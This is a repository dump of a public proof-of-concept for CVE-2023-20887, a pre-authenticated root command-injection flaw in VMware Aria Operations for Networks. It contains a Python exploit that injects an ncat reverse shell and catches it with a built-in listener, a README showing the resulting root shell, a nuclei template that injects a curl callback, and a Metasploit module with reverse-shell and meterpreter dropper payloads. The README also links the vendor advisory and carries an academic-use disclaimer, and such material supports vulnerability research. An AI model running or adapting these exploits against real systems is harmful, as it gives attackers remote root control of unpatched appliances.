Full Code of sinsinology/CVE-2023-20887 for AI

Repository: sinsinology/CVE-2023-20887
Branch: main
Commit: addc6bdf26cf
Files: 4
Total size: 10.9 KB

Directory structure:
gitextract_8kzmpbr7/

├── CVE-2023-20887.py
├── README.md
├── nuclei-CVE-2023-20887.yaml
└── vmware_vrni_rce_cve_2023_20887.rb

================================================
FILE CONTENTS
================================================

================================================
FILE: CVE-2023-20887.py
================================================
"""
VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE
Version: 6.8.0.1666364233
Exploit By: Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
A root cause analysis of the vulnerability can be found on my blog:
https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/
"""
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
import requests
from threading import Thread
import argparse
from telnetlib import Telnet
import socket
requests.packages.urllib3.disable_warnings()



argparser = argparse.ArgumentParser()
argparser.add_argument("--url", help="VRNI URL", required=True)
argparser.add_argument("--attacker", help="Attacker listening IP:PORT (example: 192.168.1.10:1337)", required=True)

args = argparser.parse_args()




def handler():
    print("(*) Starting handler")
    t = Telnet()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((args.attacker.split(":")[0],int(args.attacker.split(":")[1])))
    s.listen(1)
    conn, addr= s.accept()
    print(f"(+) Received connection from {addr[0]}")
    t.sock = conn
    print("(+) pop thy shell! (it's ready)")
    t.interact()

def start_handler():
    t = Thread(target=handler)
    t.daemon = True
    t.start()


def exploit():
    url = args.url + "/saas./resttosaasservlet"
    revshell = f'ncat {args.attacker.split(":")[0]} {args.attacker.split(":")[1]} -e /bin/sh'
    payload = """[1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`"""+revshell+"""`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}]"""
    result = requests.post(url, headers={"Content-Type":"application/x-thrift"}, verify=False, data=payload)

print("VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)")
start_handler()
exploit()

try:
    while True:
        pass
except KeyboardInterrupt:
    print("(*) Exiting...")
    exit(0)

================================================
FILE: README.md
================================================
# CVE-2023-20887
POC for CVE-2023-20887 VMWare Aria Operations for Networks (vRealize Network Insight) unauthenticated RCE

## Technical Analysis
A root cause analysis of the vulnerability can be found on my blog:
https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/

![poc](poc.gif)


## Summary
VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.
a malicious actor can get remote code execution in the context of 'root' on the appliance.
VMWare 6.x version are vulnerable.



## Usage
```plaintext
python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release
```

## Mitigations
Update to the latest version or mitigate by following the instructions within the Progress Advisory
* https://www.vmware.com/security/advisories/VMSA-2023-0012.html

## Follow Us on Twitter for the latest security research:
*  [SinSinology](https://twitter.com/SinSinology)
*  [SummoningTeam](https://twitter.com/SummoningTeam)

## Disclaimer
This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.



================================================
FILE: nuclei-CVE-2023-20887.yaml
================================================
id: vmware-vrni-rce

info:
  name: VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE (cve-2023-20887)
  author: sinsinology
  severity: high
  description: |
    VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.
    a malicious actor can get remote code execution in the context of 'root' on the appliance.
    VMWare 6.x version are vulnerable.
  reference:
    - https://www.vmware.com/security/advisories/VMSA-2023-0012.html
    - https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/
  metadata:
    max-request: 2
    verified: true
    shodan-query: title:"VMware vRealize Network Insight"
    fofa-query: title="VMware vRealize Network Insight"
  tags: vmware,rce,msf


http:
  - raw:
      - |-
        POST /saas./resttosaasservlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-thrift

        [1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`curl {{interactsh-url}}`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}]


    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: body
        words:
          - 'createSupportBundle'

      - type: status
        status:
          - 200


================================================
FILE: vmware_vrni_rce_cve_2023_20887.rb
================================================
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE',
        'Description' => %q{
          VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.
          a malicious actor can get remote code execution in the context of 'root' on the appliance.
          VMWare 6.x version are vulnerable.

          This module exploits the vulnerability to upload and execute payloads gaining root privileges.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Sina Kheirkhah', # Metasploit Module (@SinSinology) of Summoning Team (@SummoningTeam) on twitter
        ],
        'References' => [
            ['CVE', 'CVE-2023-20887'],
            ['URL', 'https://www.vmware.com/security/advisories/VMSA-2023-0012.html'],
            ['URL', 'https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/'],
        ],
        'DisclosureDate' => '2023-06-07',
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Privileged' => true,
        'Targets' => [
          [
            'Unix (In-Memory)',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :in_memory,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_bash'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X64],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => [ 'curl', 'printf' ],
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )
  end

  def check_vrni
    return send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/api/vip/i18n/api/v2/translation/products/vRNIUI/versions/6.8.0/locales/en-GB/components/UI?pseudo=false')
    })
  rescue StandardError => e
    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")
  end

  def execute_command(cmd, _opts = {})
    print_status("pop thy shell!!!")
    pop_thy_shell = "[1,\"createSupportBundle\",1,0,{\"1\":{\"str\":\"1111\"},\"2\":{\"str\":\"`sudo #{cmd}`\"},\"3\":{\"str\":\"value3\"},\"4\":{\"lst\":[\"str\",2,\"AAAA\",\"BBBB\"]}}]"

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path,'/saas./resttosaasservlet'),
      'ctype' => 'application/x-thrift',
      'headers' => {
        'Accept' => 'application/json, text/plain, */*'
      },
      'encode_params' => false,
      'data'     => pop_thy_shell
     })

  rescue StandardError => e
    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")
  end

  # Checking if the target is potential vulnerable checking the json response to contain the vRNIUI string
  # that indicates the target is running VMWare Aria Operations for Networks (vRealize Network Insight)
  def check
    print_status("Checking if #{peer} can be exploited.")
    res = check_vrni
    return CheckCode::Unknown('No response received from the target!') unless res

    body = res.get_json_document
    if body.nil? || body['data']['productName'] != 'vRNIUI'
      return CheckCode::Safe('Target is not running VMWare Aria Operations for Networks (vRealize Network Insight).')
    end

    return CheckCode::Vulnerable if body['data']['productName'] == "6.8.0"

    CheckCode::Appears('Target is running VMWare Aria Operations for Networks (vRealize Network Insight).')
  end

  def exploit
    case target['Type']
    when :in_memory
      print_status("Executing #{target.name} with #{payload.encoded}")
      execute_command(payload.encoded)
    when :linux_dropper
      print_status("Executing #{target.name}")
      execute_cmdstager
    end
  end
end